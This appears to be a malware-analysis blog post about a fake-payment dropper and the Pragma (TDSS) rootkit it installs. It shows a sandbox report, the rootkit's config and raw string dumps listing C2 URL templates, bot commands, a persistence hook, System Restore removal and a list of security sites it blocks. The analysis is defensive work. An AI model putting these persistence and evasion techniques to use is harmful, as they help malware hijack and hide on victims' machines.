<p><a href="http://i47.tinypic.com/280ikd3.png" target="_blank"><img src="http://i47.tinypic.com/280ikd3.png" border="0" alt="Fake Payment" height="300" width="350"></a></p>
<p>This is a sandbox report of the original dropper.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Detailed report of suspicious malware actions:
&nbsp;
Created file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Temp\TMP57114.tmp
Created file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Temp\topwesitjh
Created file on defined folder: C:\Documents and Settings\All Users\Favorites\_favdata.dat
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\AUTMGR32.EXE
Defined registry AutoStart location added or modified: user\current_classes\.exe\shell\open\command  = &quot;C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AUTMGR32.EXE&quot; /START &quot;%1&quot; %*
Defined registry AutoStart location added or modified: user\current_classes\.exe\shell\open\command\IsolatedCommand = &quot;%1&quot; %*
Internet connection: C:\Documents and Settings\Administrator\Desktop\dropper.exe Connects to &quot;91.213.157.69&quot; on port 80 (TCP - HTTP).
Query DNS: traffic-photos .com
&nbsp;
Risk evaluation result: High</pre></td></tr></table></div>

<p>This also downloaded the pragma rootkit, the old (and probably sold) version of TDSS.</p>
<p><a href="http://i46.tinypic.com/2uj1gtx.png" target="_blank"><img src="http://i46.tinypic.com/2uj1gtx.png" border="0" alt="Pragma Rootkit" height="300" width="350"></a></p>
<p>pragmacfg.ini:</p>
<blockquote><p>[common]<br />
botid=414796669-1177238915-152049171-1708537768<br />
affid=336<br />
subid=direct<br />
build=no<br />
[injections]<br />
explorer.exe=pragmaserf<br />
iexplore.exe=pragmaserf;pragmabbr<br />
firefox.exe=pragmabbr<br />
safari.exe=pragmabbr<br />
chrome.exe=pragmabbr<br />
opera.exe=pragmabbr</p></blockquote>
<p>pragmabbr.dll strings:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x000001E0	0x00000005	.text
0x00000207	0x00000007	`.rdata
0x0000022F	0x00000006	@.data
0x00000258	0x00000006	.reloc
0x0000027F	0x00000009	B.datatxt
0x000002A7	0x00000007	@.rdata
0x000002CF	0x00000007	@.ldata
0x000002F7	0x00000007	@.rdsec
0x00000320	0x00000005	.rsrc
0x00000347	0x00000007	@.sdata
0x0000036F	0x00000007	@.mdata
0x00000397	0x00000007	@.kdata
0x000003BF	0x00000007	@.edata
0x00001076	0x00000005	D$ Pj
0x000010D5	0x00000005	T$ Rj
0x00001134	0x00000005	L$ Qj
0x00001193	0x00000005	D$ Pj
0x000011F8	0x00000005	tZhHb
0x00001894	0x00000007	UWSPhXc
0x00001AB8	0x00000005	tDj@h
0x00001F36	0x00000005	u|h0d
0x00001F42	0x00000005	uphHd
0x00001F4E	0x00000005	udhXd
0x00001F5A	0x00000005	uXhpd
0x0000257A	0x00000005	D$8Te
0x00002582	0x00000005	D$&amp;lt;de
0x00002662	0x00000005	tFhde
0x00002670	0x00000005	t8hde
0x00002EDC	0x00000005	T$(Rj
0x000032D0	0x00000005	tuh@g
0x000033CB	0x00000007	L$ Qhhk
0x00003412	0x00000007	L$ Qhhk
0x000036F7	0x00000007	D$ Phhk
0x0000393C	0x00000006	Ut7j@h
0x000039D5	0x00000005	t7j@h
0x00003A5D	0x00000005	l( Uj
0x00003BCA	0x00000005	t7j@h
0x000044FE	0x00000007	UUUUh4k
0x00004621	0x00000005	v]j@h
0x00004EF3	0x00000006	u;WhDk
0x00004F95	0x00000005	PQhXk
0x00006178	0x0000000F	searchequal.com
0x00006188	0x0000000D	findsomup.org
0x00006198	0x0000000D	raincfind.org
0x000061A8	0x0000002C	94804860143697233939975370329435970097710202
0x000061D8	0x0000002C	85108357713673677262162845570576027004153211
0x00006208	0x00000007	License
0x00006210	0x0000001A	Software\Paladin Antivirus
0x0000622C	0x00000018	Software\Malware Defense
0x00006248	0x0000000C	\license.dat
0x00006258	0x0000000D	pragmacfg.ini
0x0000626C	0x00000005	affid
0x00006274	0x00000006	common
0x0000627C	0x00000007	default
0x00006284	0x00000005	subid
0x0000628C	0x00000012	[PANEL_SIGN_CHECK]
0x000062A0	0x0000000C	[panels_end]
0x000062B0	0x0000000E	[panels_begin]
0x000062C8	0x0000000D	[referer_end]
0x000062D8	0x0000000F	[referer_begin]
0x000062E8	0x00000013	[request_param_end]
0x000062FC	0x00000015	[request_param_begin]
0x00006314	0x0000000A	[prov_end]
0x00006320	0x0000000C	[prov_begin]
0x00006330	0x00000011	[domens_fake_end]
0x00006344	0x00000013	[domens_fake_begin]
0x00006358	0x0000003E	http://%s/?gd=%s&amp;amp;affid=%s&amp;amp;subid=%s&amp;amp;dprov=&amp;amp;mode=cr&amp;amp;v=6&amp;amp;newref=1
0x00006398	0x0000000A	OK_INSTALL
0x000063A4	0x0000000A	GET_PARAMS
0x000063C8	0x00000053	http://%s/?affid=%s&amp;amp;subid=%s&amp;amp;prov=%s&amp;amp;keyword=%s&amp;amp;ref=%s&amp;amp;direct=1&amp;amp;shurl=1&amp;amp;lastpage=%s
0x0000641C	0x00000010	clients1.google.
0x00006430	0x00000016	toolbarqueries.google.
0x00006448	0x0000000F	maps.google.com
0x00006458	0x00000016	suggestqueries.google.
0x00006470	0x00000006	/aclk?
0x00006478	0x00000007	google.
0x00006480	0x00000035	http://www.google.com/tools/toolbar/service/noupdate?
0x000064B8	0x0000000F	X-Moz: prefetch
0x000064C8	0x0000001A	click-analytics.google.com
0x000064E4	0x0000000C	search/cache
0x000064F4	0x0000000E	/search/search
0x00006504	0x0000000C	search/redir
0x00006514	0x00000009	alexa.com
0x00006520	0x00000009	facebook.
0x0000652C	0x00000011	Accept-Language: 
0x00006544	0x0000000C	User-Agent: 
0x00006554	0x0000000C	/gp/product/
0x0000656C	0x0000000A	amazon.com
0x00006580	0x0000000B	endless.com
0x00006590	0x00000071	http://www.amazon.com/gp/product/%s?ie=UTF8&amp;amp;tag=peakclick-20&amp;amp;linkCode=as2&amp;amp;camp=1789&amp;amp;creative=9325&amp;amp;creativeASIN=%s
0x00006608	0x00000063	http://www.endless.com/dp/%s?_encoding=UTF8&amp;amp;tag=peakclick-20&amp;amp;linkCode=xm2&amp;amp;camp=1789&amp;amp;creativeASIN=%s
0x00006674	0x00000005	POST 
0x0000667C	0x00000034	click-analytics.google.com
0x000066BC	0x00000007	wsock32
0x000066C4	0x00000006	ws2_32
0x000066CC	0x00000007	WSASend
0x000066D4	0x00000007	WSARecv
0x000066DC	0x00000007	connect
0x000066E4	0x0000000B	closesocket
0x000066F8	0x0000000A	DnsQuery_A
0x00006704	0x00000006	Dnsapi
0x0000670C	0x0000000A	DnsQuery_W
0x00006748	0x00000006	200 OK
0x00006768	0x00000010	pragmamainqt.dll
0x0000677C	0x00000020	pragmapdconf.ini
0x000067A0	0x0000000D	TabProcGrowth
0x000067B0	0x00000029	Software\Microsoft\Internet Explorer\Main
0x000067E0	0x0000006A	User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
0x0000684C	0x00000016	Accept-Language: en-us
0x00006864	0x0000000F	gesualdo.alexa.
0x00006874	0x00000011	.googlehosted.com
0x00006888	0x00000010	cc.msnscache.com
0x0000689C	0x00000015	searchapi.search.aol.
0x000068B4	0x00000009	askcache.
0x000068C0	0x00000014	microsofttranslator.
0x000068D8	0x0000000A	altavista.
0x000068E4	0x0000000A	alltheweb.
0x000068F0	0x00000015	scorecardresearch.com
0x00006908	0x0000000E	.alexametrics.
0x00006918	0x0000000B	googleapis.
0x00006924	0x00000006	.ixnp.
0x0000692C	0x0000000D	.everesttech.
0x0000693C	0x00000014	google-analytics.com
0x00006954	0x00000008	i.i.com.
0x00006960	0x0000000C	img.youtube.
0x00006970	0x00000009	.gstatic.
0x0000697C	0x00000007	dw.com.
0x00006984	0x00000005	.icq.
0x0000698C	0x00000007	sa.aol.
0x00006994	0x00000008	dmn.aol.
0x000069A0	0x00000005	.aol.
0x000069A8	0x0000000A	atwola.com
0x000069B4	0x00000007	aolcdn.
0x000069BC	0x00000006	atdmt.
0x000069C4	0x00000006	yahoo.
0x000069CC	0x00000005	bing.
0x000069D4	0x00000007	.google
0x000069DC	0x0000000A	rds.yahoo.
0x000069E8	0x00000005	yimg.
0x000069F0	0x00000007	http://
0x000069F8	0x00000006	Host: 
0x00006A00	0x00000007	HTTP/1.
0x00006A08	0x00000009	Referer: 
0x00006A14	0x0000000D	googlehosted.
0x00006A40	0x00000018	iexplore.exe
0x00006A5C	0x00000024	Software\Microsoft\Internet Explorer
0x00006A84	0x00000007	Version
0x00006A8C	0x00000016	firefox.exe
0x00006AA4	0x00000012	opera.exe
0x00006AB8	0x00000014	Safari.exe
0x00006AD0	0x00000014	chrome.exe
0x00006AE8	0x00000010	0123456789ABCDEF
0x00006AFC	0x0000000F	Software\pragma
0x00006B0C	0x00000024	48a10810-b8c6-442e-b021-2f1a5deb810c
0x00006B34	0x00000008	wget 3.0
0x00006B44	0x00000009	-_.!~*&amp;#39;()
0x00006B50	0x00000006	pragma
0x00006B58	0x0000000E	default
0x00006D86	0x00000007	strncpy
0x00006D90	0x00000007	_strlwr
0x00006D9A	0x00000006	strstr
0x00006DA4	0x00000006	strchr
0x00006DAE	0x00000007	isalnum
0x00006DB8	0x00000006	_ultow
0x00006DC2	0x0000001C	RtlImageDirectoryEntryToData
0x00006DE2	0x00000010	RtlImageNtHeader
0x00006DF6	0x00000005	_wtol
0x00006DFC	0x00000009	ntdll.dll
0x00006E09	0x0000000A	SASetEvent
0x00006E14	0x0000000A	WS2_32.dll
0x00006E22	0x00000008	StrStrIA
0x00006E2E	0x00000008	StrCmpIW
0x00006E3A	0x00000007	StrStrA
0x00006E44	0x0000000A	wnsprintfA
0x00006E52	0x00000009	StrCmpNIA
0x00006E5E	0x00000008	StrStrIW
0x00006E6A	0x00000008	StrCmpNA
0x00006E76	0x00000007	StrChrA
0x00006E7E	0x0000000B	SHLWAPI.dll
0x00006E8D	0x00000017	nternetCanonicalizeUrlA
0x00006EA8	0x00000010	InternetOpenUrlA
0x00006EBC	0x00000010	InternetReadFile
0x00006ED0	0x0000000D	InternetOpenA
0x00006EE1	0x00000012	nternetCloseHandle
0x00006EF4	0x0000000B	WININET.dll
0x00006F02	0x00000008	lstrcmpA
0x00006F0E	0x00000008	lstrlenA
0x00006F1A	0x00000009	lstrcpynA
0x00006F26	0x0000000C	GetTickCount
0x00006F36	0x0000000B	VirtualFree
0x00006F44	0x00000019	InitializeCriticalSection
0x00006F60	0x00000005	Sleep
0x00006F68	0x00000014	LeaveCriticalSection
0x00006F80	0x0000000D	IsBadWritePtr
0x00006F90	0x00000008	lstrcatA
0x00006F9C	0x00000013	MultiByteToWideChar
0x00006FB2	0x0000000C	GetTempPathW
0x00006FC2	0x00000013	InterlockedExchange
0x00006FD8	0x00000018	FreeLibraryAndExitThread
0x00006FF4	0x00000009	lstrcmpiA
0x00007000	0x0000000C	VirtualAlloc
0x00007010	0x00000014	EnterCriticalSection
0x00007028	0x00000019	DisableThreadLibraryCalls
0x00007044	0x00000018	GetPrivateProfileStringA
0x00007060	0x0000000C	GetLocalTime
0x00007070	0x0000000C	LoadLibraryA
0x00007080	0x00000012	GetModuleFileNameA
0x00007096	0x00000008	lstrcatW
0x000070A3	0x0000000A	loseHandle
0x000070B0	0x0000000C	GetTempPathA
0x000070C0	0x0000000D	GetSystemTime
0x000070D0	0x0000000B	DeleteFileA
0x000070DF	0x0000000B	reateThread
0x000070EE	0x00000008	lstrcpyA
0x000070FA	0x00000012	GetModuleFileNameW
0x00007111	0x0000000A	reateFileA
0x0000711E	0x0000000B	GetFileSize
0x0000712C	0x00000014	SystemTimeToFileTime
0x00007144	0x00000018	GetPrivateProfileStringW
0x00007160	0x00000009	WriteFile
0x0000716C	0x00000008	ReadFile
0x00007178	0x0000001A	WritePrivateProfileStringW
0x00007196	0x00000010	GetTempFileNameA
0x000071AA	0x0000000E	VirtualProtect
0x000071BA	0x0000000C	KERNEL32.dll
0x000071CA	0x00000010	RegQueryValueExA
0x000071DE	0x0000000D	RegOpenKeyExA
0x000071EE	0x0000000B	RegCloseKey
0x000071FC	0x0000000E	RegSetValueExA
0x0000720E	0x0000000D	RegCreateKeyA
0x0000721C	0x0000000C	ADVAPI32.dll
0x0000722C	0x00000017	SHGetSpecialFolderPathA
0x00007244	0x0000000B	SHELL32.dll
0x00007252	0x00000006	memcpy
0x0000725C	0x00000006	memset
0x00007266	0x00000007	_chkstk
0x00007270	0x00000008	_aulldiv
0x0000727C	0x00000007	_allmul
0x00007286	0x00000008	_aullrem
0x000072C2	0x0000000B	Clicker.dll
0x000072CE	0x0000000A	_Install@0
0x00008013	0x000000CE	&lt;form name=&quot;myform&quot; action=&quot;%s&quot; method=&quot;post&quot;&gt;&lt;/form&gt;&amp;lt;script ty
0x00008123	0x00000056	window.location=&quot;%s&quot;;
0x00008193	0x0000009F	&lt;a name=&quot;redirect&quot; id=&quot;redirect&quot; href=&quot;%s&quot;&gt;ClickMe&lt;/a&gt;redirect.
0x00008238	0x00000040	ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
0x00008293	0x000000CE	&lt;form name=&quot;myform&quot; action=&quot;%s&quot; method=&quot;post&quot;&gt;&lt;/form&gt;&amp;lt;script ty
0x000083A3	0x00000056	window.location=&quot;%s&quot;;
0x00008413	0x0000009F	&lt;a name=&quot;redirect&quot; id=&quot;redirect&quot; href=&quot;%s&quot;&gt;ClickMe&lt;/a&gt;redirect.
0x000084CB	0x000000CE	&lt;form name=&quot;myform&quot; action=&quot;%s&quot; method=&quot;post&quot;&gt;&lt;/form&gt;&amp;lt;script ty
0x000085DB	0x00000056	window.location=&quot;%s&quot;;
0x0000864B	0x0000009F	&lt;a name=&quot;redirect&quot; id=&quot;redirect&quot; href=&quot;%s&quot;&gt;ClickMe&lt;/a&gt;redirect.
0x00008783	0x000000CE	&lt;form name=&quot;myform&quot; action=&quot;%s&quot; method=&quot;post&quot;&gt;&lt;/form&gt;&amp;lt;script ty
0x00008893	0x00000056	window.location=&quot;%s&quot;;
0x00008903	0x0000009F	&lt;a name=&quot;redirect&quot; id=&quot;redirect&quot; href=&quot;%s&quot;&gt;ClickMe&lt;/a&gt;redirect.
0x0001E5D4	0x0000000C	63&amp;lt;3B3H3N3T3
0x000260A0	0x0000000C	kernel32.dll
0x000260AF	0x0000000F	GetCommandLineA
0x000260C1	0x0000000C	GetTempPathA
0x000260D0	0x0000000B	CloseHandle
0x000260DE	0x0000000F	GetStartupInfoA
0x000260F0	0x0000000E	VirtualProtect
0x00026101	0x00000009	FatalExit
0x0002610E	0x0000000A	user32.dll
0x0002611B	0x00000012	IsDlgButtonChecked
0x00026130	0x0000000C	GetUpdateRgn
0x00027032	0x0000000D	sciqfvgxk.exe
0x00027040	0x0000000C	SetIktawoxpd</pre></td></tr></table></div>

<p>pragmac.dll strings:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x000001D0	0x00000005	.text
0x000001F7	0x00000007	`.rdata
0x0000021F	0x00000006	@.data
0x00000248	0x00000005	.test
0x00000270	0x00000006	.reloc
0x00000297	0x00000009	B.datatxt
0x000002BF	0x00000007	@.rdata
0x000002E7	0x00000007	@.ldata
0x0000030F	0x00000007	@.rdsec
0x00000338	0x00000005	.rsrc
0x0000035F	0x00000007	@.sdata
0x00000387	0x00000007	@.mdata
0x000003AF	0x00000007	@.kdata
0x000003D7	0x00000007	@.edata
0x000011DF	0x00000008	T$0RVhHD
0x00001E01	0x00000006	SVWj@h
0x00002028	0x00000005	QVj@h
0x000029D9	0x00000005	tGj@h
0x00002D77	0x00000005	SWhhF
0x0000300E	0x00000005	SVhtD
0x000043A7	0x0000000D	 \license.dat
0x000043B8	0x0000002C	94804860143697233939975370329435970097710202
0x000043E8	0x00000018	ROOT\DEFAULT
0x00004404	0x0000001A	SystemRestore
0x00004420	0x00000014	SRRemoveRestorePoint
0x00004438	0x0000000C	srclient.dll
0x00004448	0x0000001C	SequenceNumber
0x00004468	0x00000008	%s_%s_ok
0x00004480	0x00000054	\registry\machine\software\PRAGMA\injector
0x000044DC	0x0000000A	injections
0x000044E8	0x00000005	%s;%s
0x000044F8	0x00000006	PRAGMA
0x00004500	0x00000010	cmddelay
0x00004518	0x00000042	\registry\machine\software\PRAGMA
0x0000455C	0x0000000E	PRAGMAsrcr.dat
0x00004570	0x00000054	\registry\machine\software\PRAGMA\versions
0x000045DC	0x00000012	%[^.].%[^(](%[^)])
0x000045F0	0x00000005	%s/%s
0x000045F8	0x0000000A	build
0x00004610	0x0000000A	affid
0x0000461C	0x0000000A	subid
0x00004628	0x00000007	%s (%d)
0x00004630	0x00000035	file=%s&amp;amp;address=0x%x&amp;amp;image=%s&amp;amp;code=0x%x&amp;amp;info=%s&amp;amp;id=%s
0x00004668	0x00000010	PRAGMAerrors.log
0x0000467C	0x00000018	%[^;];%[^;];%[^;];%[^;];
0x00004698	0x0000000F	software\PRAGMA
0x000046A8	0x00000005	affid
0x000046B0	0x00000005	subid
0x000046B8	0x00000005	botid
0x000046C0	0x00000006	common
0x000046C8	0x00000005	build
0x000046D0	0x0000000E	netsvcs
0x000046E0	0x0000004A	\ACA9DB5C-7EAB-4026-A9A7-BED05538CE9D
0x0000472C	0x0000001A	PRAGMAcfg.ini
0x00004748	0x0000000B	PRAGMAc.dll
0x00004754	0x0000000B	PRAGMAd.sys
0x00004768	0x0000000A	%s%s%x.tmp
0x00004778	0x000000AC	software\microsoft\internet explorer\main\featurecontrol\feature_enable_ie_compression
0x00004828	0x0000000A	urlmon.dll
0x00004834	0x00000005	.test
0x0000483C	0x00000005	%u-%s
0x0000484C	0x00000022	\\?\globalroot\systemroot\system32
0x00004870	0x00000005	%s\%s
0x00004878	0x0000002F	Content-Type: application/x-www-form-urlencoded
0x000048A8	0x0000000C	PRAGMA
0x000048B8	0x00000015	ObtainUserAgentString
0x000048D0	0x00000037	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0x000053DE	0x00000008	tdll.dll
0x000053E7	0x00000007	CmdExec
0x000053EF	0x0000000C	CmdExecAffID
0x000053FC	0x0000000C	CmdExecBuild
0x00005409	0x0000000C	CmdExecSubID
0x00005416	0x0000000B	CmdExecType
0x00005422	0x0000000E	CmdExecVersion
0x00005431	0x00000008	CmdKnock
0x0000543A	0x0000000C	FileDownload
0x00005447	0x00000012	FileDownloadRandom
0x0000545A	0x0000000B	InjectorAdd
0x00005466	0x0000000B	InjectorSet
0x00005472	0x00000013	ModuleDownloadUnxor
0x00005486	0x0000000A	ModuleLoad
0x00005491	0x0000000C	ModuleUnload
0x0000549E	0x0000000B	SetCmdDelay
0x00007000	0x00000011	336;direct;no;no;
0x0000F0A0	0x0000000C	kernel32.dll
0x0000F0AF	0x0000000F	GetCommandLineA
0x0000F0C1	0x0000000C	GetTempPathA
0x0000F0D0	0x0000000B	CloseHandle
0x0000F0DE	0x0000000F	GetStartupInfoA
0x0000F0F0	0x0000000E	VirtualProtect
0x0000F101	0x00000009	FatalExit
0x0000F10E	0x0000000A	user32.dll
0x0000F11B	0x00000012	IsDlgButtonChecked
0x0000F130	0x0000000C	GetUpdateRgn
0x0000F432	0x0000000A	cseteo.exe
0x0000F43D	0x00000007	Caokyjf</pre></td></tr></table></div>

<p>pragmaserf.dll strings:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x000001D8	0x00000005	.text
0x000001FF	0x00000007	`.rdata
0x00000227	0x00000006	@.data
0x00000250	0x00000006	.reloc
0x00000277	0x00000009	B.datatxt
0x0000029F	0x00000007	@.rdata
0x000002C7	0x00000007	@.ldata
0x000002EF	0x00000007	@.rdsec
0x00000318	0x00000005	.rsrc
0x0000033F	0x00000007	@.sdata
0x00000367	0x00000007	@.mdata
0x0000038F	0x00000007	@.kdata
0x000003B7	0x00000007	@.edata
0x00001076	0x00000005	D$ Pj
0x000010D5	0x00000005	T$ Rj
0x00001134	0x00000005	L$ Qj
0x00001193	0x00000005	D$ Pj
0x000011F8	0x00000005	tZhHR
0x00001278	0x00000005	$PhXR
0x000012B7	0x00000005	D$$Pj
0x000012F1	0x00000005	D$(Pj
0x0000146F	0x00000006	D$ hTS
0x0000161E	0x00000005	L$DQh
0x000026E3	0x00000007	D$,PSSh
0x00002954	0x00000007	UWSPh&amp;lt;V
0x00002C4C	0x00000005	D$,Pj
0x00002C91	0x00000005	D$,Pj
0x00003092	0x00000007	D$&amp;lt;PSSh
0x000036A1	0x00000005	v]j@h
0x0000413E	0x00000007	UUUUh`]
0x000045B6	0x00000007	l$4VWUj
0x000045E2	0x00000005	D$&amp;lt;Pj
0x0000465D	0x00000005	T$$Rj
0x000046CE	0x00000005	D$4Pj
0x00005178	0x0000000F	searchequal.com
0x00005188	0x0000000D	findsomup.org
0x00005198	0x0000000D	raincfind.org
0x000051A8	0x0000002C	94804860143697233939975370329435970097710202
0x000051D8	0x0000002C	85108357713673677262162845570576027004153211
0x00005208	0x00000007	License
0x00005210	0x0000001A	Software\Paladin Antivirus
0x0000522C	0x00000018	Software\Malware Defense
0x00005248	0x0000000C	\license.dat
0x00005258	0x00000034	Software\Microsoft\Internet Explorer\Recovery\Active
0x00005290	0x00000012	[PANEL_SIGN_CHECK]
0x000052A4	0x0000000C	[panels_end]
0x000052B4	0x0000000E	[panels_begin]
0x000052C8	0x0000000F	Use FormSuggest
0x000052D8	0x00000029	Software\Microsoft\Internet Explorer\Main
0x00005310	0x00000043	Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
0x00005354	0x00000013	NoReopenLastSession
0x00005368	0x00000036	Software\Policies\Microsoft\Internet Explorer\Recovery
0x000053A0	0x0000000B	AutoRecover
0x000053AC	0x0000002D	Software\Microsoft\Internet Explorer\Recovery
0x000053E0	0x00000012	Check_Associations
0x000053F4	0x00000016	Play_Background_Sounds
0x0000540C	0x0000003B	AppEvents\Schemes\Apps\Explorer\ActivatingDocument\.current
0x0000544C	0x00000033	AppEvents\Schemes\Apps\Explorer\Navigating\.current
0x00005480	0x00000031	AppEvents\Schemes\Apps\.Default\CCSelect\.Current
0x000054B4	0x00000008	test.reg
0x000054C0	0x00000010	\regedit.exe /s 
0x000054D4	0x00000009	referer: 
0x000054E4	0x0000000E	msacm32
0x000054F4	0x00000007	msacm32
0x000054FC	0x0000000B	Referer: %s
0x00005508	0x0000000C	iexplore.exe
0x00005518	0x0000000E	popupcount_end
0x00005528	0x00000012	[popupcount_begin]
0x0000553C	0x00000010	[runs_count_end]
0x00005550	0x00000012	[runs_count_begin]
0x00005564	0x00000012	[urls_to_serf_end]
0x00005578	0x00000014	[urls_to_serf_begin]
0x00005590	0x00000014	[refs_to_change_end]
0x000055A8	0x00000016	[refs_to_change_begin]
0x000055C0	0x0000000F	[popupurl2_end]
0x000055D0	0x00000011	[popupurl2_begin]
0x000055E4	0x00000022	\Internet Explorer\iexplore.exe %s
0x00005608	0x0000000D	pragmacfg.ini
0x0000561C	0x00000005	affid
0x00005624	0x00000006	common
0x0000562C	0x00000007	default
0x00005634	0x00000005	subid
0x0000563C	0x00000037	http://%s/?gd=%s&amp;amp;affid=%s&amp;amp;subid=%s&amp;amp;prov=&amp;amp;mode=cr&amp;amp;v=6nkr
0x00005674	0x0000000A	OK_INSTALL
0x00005680	0x0000000A	GET_PARAMS
0x00005694	0x0000000F	Software\pragma
0x000056AC	0x00000008	TestDesk
0x000056B8	0x0000000A	IEUser.exe
0x000056C4	0x0000000C	explorer.exe
0x000056D4	0x0000000A	chrome.exe
0x000056E0	0x0000000A	Safari.exe
0x000056EC	0x00000009	opera.exe
0x000056F8	0x0000000B	firefox.exe
0x00005704	0x0000000A	ieuser.exe
0x00005710	0x00000014	\pragmamfeklnmal.dll
0x00005728	0x00000016	HttpAddRequestHeadersA
0x00005740	0x00000007	wininet
0x00005748	0x00000016	HttpAddRequestHeadersW
0x00005760	0x00000010	HttpOpenRequestW
0x00005774	0x00000010	HttpOpenRequestA
0x00005788	0x00000010	InternetConnectW
0x0000579C	0x00000010	InternetConnectA
0x000057B0	0x00000007	http://
0x000057B8	0x0000000C	LoadLibraryW
0x000057C8	0x00000008	kernel32
0x000057D4	0x0000000C	LoadLibraryA
0x000057E4	0x00000014	CreateProcessAsUserW
0x000057FC	0x00000008	Advapi32
0x00005808	0x0000000C	indobids.com
0x00005818	0x00000011	spywarefixpro.com
0x0000582C	0x00000011	trojan-killer.net
0x00005840	0x0000000D	hijackthis.nl
0x00005850	0x00000014	virusremovalguru.com
0x00005868	0x0000000F	pc-helpforum.be
0x00005878	0x00000015	howtofixcomputers.com
0x00005890	0x0000000A	zimbio.com
0x0000589C	0x0000000C	xp-vista.com
0x000058AC	0x00000015	windowsprotection.net
0x000058C4	0x00000015	whois.domaintools.com
0x000058DC	0x00000013	webtoolsandtips.com
0x000058F0	0x0000000E	wareseeker.com
0x00005900	0x0000000E	tech.yahoo.com
0x00005910	0x0000000F	spywarevoid.com
0x00005920	0x00000013	spywares-remove.com
0x00005934	0x00000011	spywareremove.com
0x00005948	0x00000013	spywaredetector.net
0x0000595C	0x00000012	spyware-techie.com
0x00005970	0x00000009	spyna.com
0x0000597C	0x00000008	snpx.com
0x00005988	0x0000001D	rogueantispyware.blogspot.com
0x000059A8	0x0000001A	rogue-malware.blogspot.com
0x000059C4	0x0000000F	removevirus.org
0x000059D4	0x0000000D	removeit.info
0x000059E4	0x00000017	remove-spy.blogspot.com
0x000059FC	0x00000012	remove-malware.net
0x00005A10	0x00000010	removal-tool.com
0x00005A24	0x00000013	precisesecurity.com
0x00005A38	0x0000000F	powerclickz.com
0x00005A48	0x0000000C	pcthreat.com
0x00005A58	0x0000000E	pcindanger.com
0x00005A68	0x0000000B	pc1news.com
0x00005A74	0x0000000F	news.loaris.com
0x00005A84	0x00000011	myantispyware.com
0x00005A98	0x0000000F	malwarehelp.org
0x00005AA8	0x0000000C	lognrock.com
0x00005AB8	0x0000000C	kiguolis.com
0x00005AC8	0x00000009	iobit.com
0x00005AD4	0x0000000F	im-infected.com
0x00005AE4	0x00000010	hands-oncorp.com
0x00005AF8	0x0000000D	geekstogo.com
0x00005B08	0x00000014	freepcsecurity.co.uk
0x00005B20	0x0000000F	forum.drweb.com
0x00005B30	0x0000000E	findmysoft.com
0x00005B40	0x0000000B	fakeware.ru
0x00005B4C	0x00000011	ezinearticles.com
0x00005B60	0x00000012	exterminate-it.com
0x00005B74	0x00000012	enigmasoftware.com
0x00005B88	0x0000000F	downloadbox.org
0x00005B98	0x0000000E	comprolive.com
0x00005BA8	0x00000024	cid-556a72d9038a7868.spaces.live.com
0x00005BD0	0x00000018	carnegiecyberacademy.com
0x00005BEC	0x0000000F	cantalktech.com
0x00005BFC	0x0000000F	brothersoft.com
0x00005C0C	0x0000000F	blogcatalog.com
0x00005C1C	0x00000014	bleepingcomputer.com
0x00005C34	0x0000001E	bharath-m-narayan.blogspot.com
0x00005C54	0x00000012	beyondsecurity.com
0x00005C68	0x00000010	averyjparker.com
0x00005C7C	0x00000018	antispyware.wetpaint.com
0x00005C98	0x0000000F	antispyware.com
0x00005CA8	0x00000014	anti-spyware-101.com
0x00005CC0	0x00000011	answers.yahoo.com
0x00005CD4	0x0000000C	PCTHREAT.com
0x00005CE4	0x0000000F	411-spyware.com
0x00005CF4	0x0000000D	2-viruses.com
0x00005D04	0x0000000D	2-spyware.com
0x00005D14	0x0000000A	2-free.net
0x00005D20	0x00000024	dae91b54-7265-4dac-b01e-e4787b4ccaea
0x00005D48	0x00000006	pragma
0x00005D60	0x00000008	wget 3.0
0x00005D6C	0x00000008	Internet
0x00005D78	0x00000020	SeDebugPrivilege
0x00005FC6	0x00000006	strstr
0x00005FD0	0x00000007	strncpy
0x00005FDA	0x00000007	strtoul
0x00005FE4	0x00000007	_strlwr
0x00005FEE	0x0000001C	RtlImageDirectoryEntryToData
0x0000600E	0x00000019	ZwQueryInformationProcess
0x0000602A	0x00000010	RtlImageNtHeader
0x0000603C	0x00000009	ntdll.dll
0x00006048	0x00000008	StrStrIA
0x00006054	0x00000008	StrStrIW
0x00006060	0x0000000A	wnsprintfA
0x0000606E	0x00000009	StrCmpNIA
0x00006078	0x0000000B	SHLWAPI.dll
0x00006087	0x00000010	nternetCrackUrlA
0x0000609A	0x00000010	InternetReadFile
0x000060AE	0x0000000D	InternetOpenA
0x000060BF	0x00000012	nternetCloseHandle
0x000060D4	0x00000010	InternetOpenUrlA
0x000060E6	0x0000000B	WININET.dll
0x000060F4	0x00000017	SHGetSpecialFolderPathA
0x0000610C	0x0000000B	SHELL32.dll
0x0000611A	0x0000000D	EnumProcesses
0x0000612A	0x00000014	GetModuleFileNameExA
0x00006140	0x00000009	PSAPI.DLL
0x0000614D	0x0000000A	reateFileA
0x0000615A	0x00000008	lstrlenA
0x00006166	0x0000000B	VirtualFree
0x00006174	0x00000014	GetWindowsDirectoryA
0x0000618C	0x00000009	WriteFile
0x00006198	0x0000000F	GetCommandLineA
0x000061AA	0x00000013	WideCharToMultiByte
0x000061C0	0x00000005	Sleep
0x000061C9	0x0000000D	reateProcessA
0x000061DA	0x0000000D	IsBadWritePtr
0x000061EA	0x00000010	TerminateProcess
0x000061FE	0x00000008	lstrcatA
0x0000620A	0x00000013	MultiByteToWideChar
0x00006220	0x0000000F	GetStartupInfoW
0x00006232	0x00000018	FreeLibraryAndExitThread
0x0000624E	0x00000009	lstrcmpiA
0x0000625A	0x0000000C	VirtualAlloc
0x0000626A	0x00000019	DisableThreadLibraryCalls
